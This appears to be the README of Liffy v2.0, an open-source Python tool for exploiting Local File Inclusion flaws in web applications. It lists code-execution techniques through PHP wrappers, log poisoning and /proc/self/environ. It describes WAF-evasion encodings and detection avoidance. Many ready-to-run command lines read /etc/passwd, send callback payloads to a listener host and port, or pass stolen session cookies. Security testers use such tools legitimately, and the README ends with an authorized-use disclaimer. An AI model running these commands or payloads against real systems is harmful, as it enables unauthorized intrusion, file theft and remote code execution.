A powerful Python tool for Local File Inclusion (LFI) exploitation with advanced features including WAF bypass, encoding techniques, and comprehensive vulnerability detection.
Liffy v2.0 is the significantly enhanced version of liffy which was originally created by rotlogix/liffy. This version includes modern features like Rich terminal output, YAML configuration, enhanced threading, and multiple advanced exploitation techniques.
⚠️ Lot of new changes were vibe coded.
- data:// - Code execution via data wrapper
- expect:// - Code execution via expect wrapper
- input:// - Code execution via input wrapper
- filter:// - Arbitrary file reads via filter wrapper
- /proc/self/environ - Code execution in CGI mode
- Apache access.log poisoning - Log file exploitation
- Linux auth.log SSH poisoning - SSH log exploitation
- Null Byte Poisoning - Legacy PHP null byte attacks
- ZIP wrapper exploitation - ZIP file inclusion attacks
- Wrapper detection - Safe probes for common LFI stream wrappers
- Out-of-band probes - Callback payloads for blind wrapper/SSRF-style behavior
- Blind LFI checks - Response-difference probes when file contents are not reflected
- Auto scan mode - Safe detection-first scan plan across traversal, wrappers, and blind checks
- WAF Evasion - Multiple bypass techniques for common WAFs
- Advanced Encoding - Double URL encoding, Unicode, case variations
- POST Request Support - Full POST method support with custom data
- Custom Headers - Configurable HTTP headers
- User-Agent Rotation - Randomized user agents to avoid detection
- Rate Limiting - Configurable request throttling
- Multi-threading - Enhanced thread pool management
- Detection Mode - Vulnerability scanning without exploitation
- Rich Terminal Output - Beautiful colored output with progress bars
- YAML Configuration - Persistent settings management
- Enhanced Vulnerability Detection - Advanced response analysis with confidence scoring
- Thread Pool Management - Optimized performance with adaptive threading
- Configuration Management - YAML-based settings with CLI overrides
- Comprehensive Logging - Detailed execution reports and progress tracking
Make sure you are using Python 3. Liffy doesn't support Python 2. The examples below use uv run python so commands run inside the project environment.
# Install uv if you haven't already
curl -LsSf https://astral.sh/uv/install.sh | sh
# Clone the repository
git clone https://github.com/mzfr/liffy
cd liffy
# Create virtual environment with uv
uv venv
# Install dependencies from pyproject.toml
uv sync
# Run liffy
uv run python liffy.py --helpuv run python liffy.py <URL> [OPTIONS]usage: liffy.py [-h] [-d] [-i] [-e] [-f] [-p] [-a] [-ns] [-r] [--ssh]
[-l LOCATION] [--cookies COOKIES] [-dt] [-t THREADS]
[--detection] [--null-byte] [--zip] [--encoding]
[--waf-bypass] [--method {GET,POST}] [--post-data POST_DATA]
[--headers HEADERS] [--lhost LHOST] [--lport LPORT]
[--read-file READ_FILE] [-y] [--timeout TIMEOUT]
[--proxy PROXY] [--verify-tls] [--user-agent USER_AGENT]
[--oob] [--oob-url OOB_URL] [--blind] [--auto]
[--delay DELAY] [--retries RETRIES] [--json] [--output OUTPUT]
[--quiet] [--no-color] [--no-banner] [--config]
[url]
positional arguments:
url URL to test for LFI
Core Techniques:
-d, --data Use data:// technique
-i, --input Use input:// technique
-e, --expect Use expect:// technique
-f, --filter Use filter:// technique
-p, --proc Use /proc/self/environ technique
-a, --access Apache access logs technique
--ssh SSH auth log poisoning
-dt, --directorytraverse Test for Directory Traversal
--null-byte Test for Null Byte Poisoning
--zip Test for ZIP wrapper exploitation
--wrappers, --wrapper Detect common LFI stream wrappers
--wrapper-list WRAPPER_LIST
Path to custom wrapper probe payload list
--oob Send out-of-band callback probes
--oob-url OOB_URL OOB callback base URL
--blind Run blind LFI response-difference checks
--blind-list BLIND_LIST
Path to custom blind LFI probe list
--auto Run a safe automatic scan plan
Advanced Options:
--encoding Use advanced encoding/bypass techniques
--waf-bypass Use WAF evasion techniques
--method {GET,POST} HTTP method to use (default: GET)
--post-data POST_DATA POST data (format: key=value&key2=value2)
--headers HEADERS Custom headers (format: Header1:Value1,Header2:Value2)
--detection Only perform LFI detection, no exploitation
Request Options:
--timeout TIMEOUT HTTP request timeout in seconds
--proxy PROXY HTTP(S) proxy URL, e.g. http://127.0.0.1:8080
--verify-tls Verify TLS certificates instead of using insecure requests
--user-agent UA Custom User-Agent header
--delay DELAY Delay between requests in seconds
--retries RETRIES HTTP retries per request
Automation Options:
--lhost LHOST Callback host for staged payloads
--lport LPORT Callback port for staged payloads
--read-file PATH File path to read with filter://
-y, --yes Use defaults for prompts and run non-interactively
--json Print a JSON run summary
--output OUTPUT Write JSON run summary to a file
--quiet Suppress normal terminal output
General Options:
-ns, --nostager Execute payload directly, do not use stager
-r, --relative Use path traversal sequences for attack
-l, --location LOCATION Path to target file (access log, auth log, etc.)
--cookies COOKIES Session cookies for authentication
-t, --threads THREADS Number of threads to use (default: 5)
--no-color Disable colored output
--no-banner Disable banner display
--config Create default YAML configuration fileCreate a configuration file for persistent settings:
uv run python liffy.py --configThis creates liffy_config.yaml with default settings:
# Liffy Configuration File
max_threads: 5
rate_limit_delay: 0.1
disable_colors: false
disable_banner: false
quiet: false
default_method: GET
user_agent_rotation: true
request_timeout: 15
proxy: null
verify_tls: false
retries: 0Set disable_banner: true to hide the startup banner/logo by default. CLI flags still override config values, so you can also use --no-banner, --no-color, or --quiet for one-off runs.
You can also use environment variables:
LIFFY_THREADS- Number of threadsLIFFY_RATE_LIMIT- Rate limit delayLIFFY_NO_COLOR- Disable colors (true/false)
When --waf-bypass is enabled, liffy automatically applies multiple evasion techniques:
- Comment Injection:
/**/,#,; - Protocol Confusion:
file:///,pHp:// - Encoding Layering: Multiple encoding combinations
- Path Obfuscation:
./,../, null bytes
With --encoding, liffy applies advanced encoding methods:
- Double URL Encoding:
%252e%252e%252f - Unicode Encoding:
\u002e\u002e\u002f - Mixed Case:
..%2F,..%2f - HTML Entity Encoding:
../
# POST with form data
uv run python liffy.py "http://target.com/lfi.php" -d --method POST --post-data "file=../../etc/passwd"
# POST with custom headers
uv run python liffy.py "http://target.com/lfi.php" -d --method POST --headers "X-Forwarded-For:127.0.0.1,Authorization:Bearer token123"# Send traffic through a local proxy and retry transient failures
uv run python liffy.py "http://target.com/lfi.php?file=" -d \
--proxy "http://127.0.0.1:8080" --timeout 20 --retries 2
# Use a fixed User-Agent and custom request delay
uv run python liffy.py "http://target.com/lfi.php?file=" --detection -f \
--user-agent "liffy/2.0" --delay 0.5uv run python liffy.py "http://example.com/page.php?file=" -duv run python liffy.py "http://example.com/page.php?file=" -d -i -e -fuv run python liffy.py "http://example.com/page.php?file=" --detection -d -i -euv run python liffy.py "http://example.com/page.php?file=" -d --waf-bypass --encodinguv run python liffy.py "http://example.com/page.php?file=" -d -t 10 --configuv run python liffy.py "http://example.com/upload.php" -d --method POST \
--post-data "action=read&file=../../etc/passwd" \
--headers "User-Agent:Mozilla/5.0,X-Forwarded-For:192.168.1.1"uv run python liffy.py "http://example.com/page.php?file=" -auv run python liffy.py "http://example.com/page.php?file=" --sshuv run python liffy.py "http://example.com/page.php?file=" -a -l "/var/log/apache2/access.log"uv run python liffy.py "http://example.com/page.php?file=" -d -ruv run python liffy.py "http://example.com/page.php?file=" -dtuv run python liffy.py "http://example.com/page.php?file=" --null-byteuv run python liffy.py "http://example.com/page.php?file=" --zipuv run python liffy.py "http://example.com/page.php?file=" --wrappersWrapper detection uses safe default probes for file://, php://filter, data://, php://temp, php://memory, and related wrappers. zip://, phar://, and glob:// are treated as informational/conditional because they usually require target-side files or sink behavior that exposes listings.
You can provide a custom wrapper payload list. If --wrapper-list is omitted, liffy falls back to the built-in probes:
uv run python liffy.py "http://example.com/page.php?file=" --wrapper \
--wrapper-list payload_wordlists/wrappers.txtEach non-empty line can be either a raw payload or name=payload:
php-filter-passwd=php://filter/read=convert.base64-encode/resource=/etc/passwd
file-winini=file:///c:/windows/win.ini
uv run python liffy.py "http://example.com/page.php?file=" --oob \
--oob-url "https://example.oast.site"Use this with an HTTP/DNS callback listener. Liffy sends URL-wrapper style payloads and you verify whether the target calls back.
uv run python liffy.py "http://example.com/page.php?file=" --blindBlind checks compare existing-file probes against random missing-file baselines and report status, length, or timing differences when content is not directly reflected.
You can provide a custom blind probe list. If --blind-list is omitted or empty, liffy uses built-in probes:
uv run python liffy.py "http://example.com/page.php?file=" --blind \
--blind-list payload_wordlists/blind_lfi.txtEach non-empty line can be either a raw payload or name=payload:
linux-passwd=/etc/passwd
proc-environ=/proc/self/environ
laravel-env=.env
uv run python liffy.py "http://example.com/page.php?file=" --auto--auto enables detection-only directory traversal, wrapper checks, and blind checks. If --oob-url is also provided, it includes OOB probes.
uv run python liffy.py "http://example.com/page.php?file=" \
-d -i -e -f -p -a --ssh -dt --null-byte --zip --wrappers --blind \
--encoding --waf-bypass --detectionuv run python liffy.py "http://example.com/page.php?file=" -d \
--cookies "PHPSESSID=abc123; auth_token=xyz789"uv run python liffy.py "http://example.com/page.php?file=" -d \
--lhost 10.10.14.2 --lport 4444 --yesuv run python liffy.py "http://example.com/page.php?file=" -f \
--read-file /etc/passwd --yesuv run python liffy.py "http://example.com/page.php?file=" --detection -f --jsonuv run python liffy.py "http://example.com/page.php?file=" --detection -f \
--output findings.jsonuv run python liffy.py "http://example.com/page.php?file=" -d --no-color --no-banneruv run python liffy.py "http://example.com/page.php?file=" --detection -f --quiet --output findings.jsonThe following default locations are used when no custom path is specified:
- SSH auth.log:
/var/log/auth.log - Apache access.log:
/var/log/apache2/access.log - Alternative Apache log:
/var/log/httpd/access_log
We welcome contributions! Here's how you can help:
- New LFI exploitation techniques
- Additional WAF bypass methods
- Enhanced encoding techniques
- Payload optimization
- Detection improvements
- Report issues via GitHub Issues
- Include detailed reproduction steps
- Provide target environment details
- Fork the repository
- Create a feature branch
- Make your changes with tests
- Submit a pull request
Feel free to open an issue for any questions or suggestions!
Liffy's detection mode provides comprehensive vulnerability analysis:
- High Confidence (80-100%): Strong indicators like
/etc/passwdcontent - Medium Confidence (50-79%): Partial file content or suspicious responses
- Low Confidence (20-49%): Potential indicators requiring manual verification
- File Content Analysis: Recognizes Linux, Windows, and PHP file patterns
- Response Analysis: HTTP status codes, content length, timing analysis
- WAF Detection: Identifies common WAF signatures
- Evidence Collection: Captures proof of vulnerability for reporting
[+] VULNERABILITY SUMMARY
==================================================
[1] Vulnerability Found
Payload: ../../etc/passwd
Confidence: 85%
Evidence: Linux /etc/passwd file: root:
Status Code: 200
Content Length: 1547# Use WAF bypass techniques
uv run python liffy.py "http://target.com/lfi.php" -d --waf-bypass
# Reduce thread count and increase delays
uv run python liffy.py "http://target.com/lfi.php" -d -t 1# Increase delay in config file
max_threads: 2
rate_limit_delay: 1.0For verbose output, you can modify the configuration:
debug_mode: true
verbose_output: trueLiffy is designed for authorized security testing only.
- Only use on systems you own or have explicit permission to test
- Follow responsible disclosure practices
- Respect rate limits and avoid DoS conditions
- Be aware of legal implications in your jurisdiction
The authors are not responsible for misuse of this tool.
- Original liffy by hvqzao
- Initial concept from rotlogix/liffy
- LFI exploitation techniques from various security research
- WAF bypass methods from public security resources
- PHP wrapper exploitation documentation
- Logo design from renderforest
- Terminal styling using Rich library
This project is licensed under the GNU General Public License v3.0 - see the LICENSE file for details.